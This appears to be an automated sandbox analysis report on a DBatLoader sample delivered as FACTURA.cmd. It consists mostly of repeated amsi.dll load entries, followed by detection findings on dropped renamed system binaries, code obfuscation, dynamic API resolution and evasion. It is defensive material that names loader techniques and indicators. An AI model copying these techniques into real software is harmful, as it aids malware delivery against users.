Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\Public\Libraries\Host.COM

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Binary contains a suspicious time stamp

Source: FACTURA.cmd

Static file information: File size 7518388 > 1048576

Source:	Binary string: easinvoker.pdb source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: cmd.pdb source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: easinvoker.pdbGCTL source: Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.000000000286A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match

File source: 9.2.Host.COM.2df0000.2.unpack, type: UNPACKEDPE

Source: alpha.exe.2.dr

Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02E08954 LoadLibraryW,GetProcAddress,FreeLibrary,

PE file contains sections with non-standard names

Source: alpha.exe.2.dr	Static PE information: section name: .didat
Source: kn.exe.4.dr	Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C3668 push rsp; ret	6_2_00007FF7E07C3669
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1D2FC push 02E1D367h; ret	9_2_02E1D35F
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF63D3 push 02DF640Bh; ret	9_2_02DF6403
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1C374 push 02E1C56Ah; ret	9_2_02E1C562
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF332C push eax; ret	9_2_02DF3368
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1D0AC push 02E1D125h; ret	9_2_02E1D11D
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E03073 push 02E030C1h; ret	9_2_02E030B9
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E03074 push 02E030C1h; ret	9_2_02E030B9
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1D1F8 push 02E1D288h; ret	9_2_02E1D280
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1D144 push 02E1D1ECh; ret	9_2_02E1D1E4
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0F104 push ecx; mov dword ptr [esp], edx	9_2_02E0F109
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF678C push 02DF67CEh; ret	9_2_02DF67C6
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF678A push 02DF67CEh; ret	9_2_02DF67C6
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DFD5A8 push 02DFD5D4h; ret	9_2_02DFD5CC
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E1C56C push 02E1C56Ah; ret	9_2_02E1C562
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DFC574 push ecx; mov dword ptr [esp], edx	9_2_02DFC579
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E08AD2 push 02E08B0Ch; ret	9_2_02E08B04
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E08AD4 push 02E08B0Ch; ret	9_2_02E08B04
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0AADB push 02E0AB14h; ret	9_2_02E0AB0C
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0AADC push 02E0AB14h; ret	9_2_02E0AB0C
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DFCBF4 push 02DFCD7Ah; ret	9_2_02DFCD72
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E08874 push 02E088B6h; ret	9_2_02E088AE
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E64850 push eax; ret	9_2_02E64920
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DFC9E6 push 02DFCD7Ah; ret	9_2_02DFCD72
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0694E push 02E069FBh; ret	9_2_02E069F3
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E06950 push 02E069FBh; ret	9_2_02E069F3
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E07914 push 02E07991h; ret	9_2_02E07989
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E05E84 push ecx; mov dword ptr [esp], edx	9_2_02E05E86
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E02F68 push 02E02FDEh; ret	9_2_02E02FD6

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\Public\kn.exe

File created: C:\Users\Public\Libraries\Host.COM

Drops PE files to the user directory

Drops PE files

Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\Host.COM	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe	Jump to dropped file

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02DF676A IsIconic,

9_2_02DF676A

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02E0AB18 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_02E0AB18

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\Libraries\Host.COM	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2DF0000 memory commit 570007552	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2DF1000 memory commit 570179584	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2E1D000 memory commit 570003456	Jump to behavior
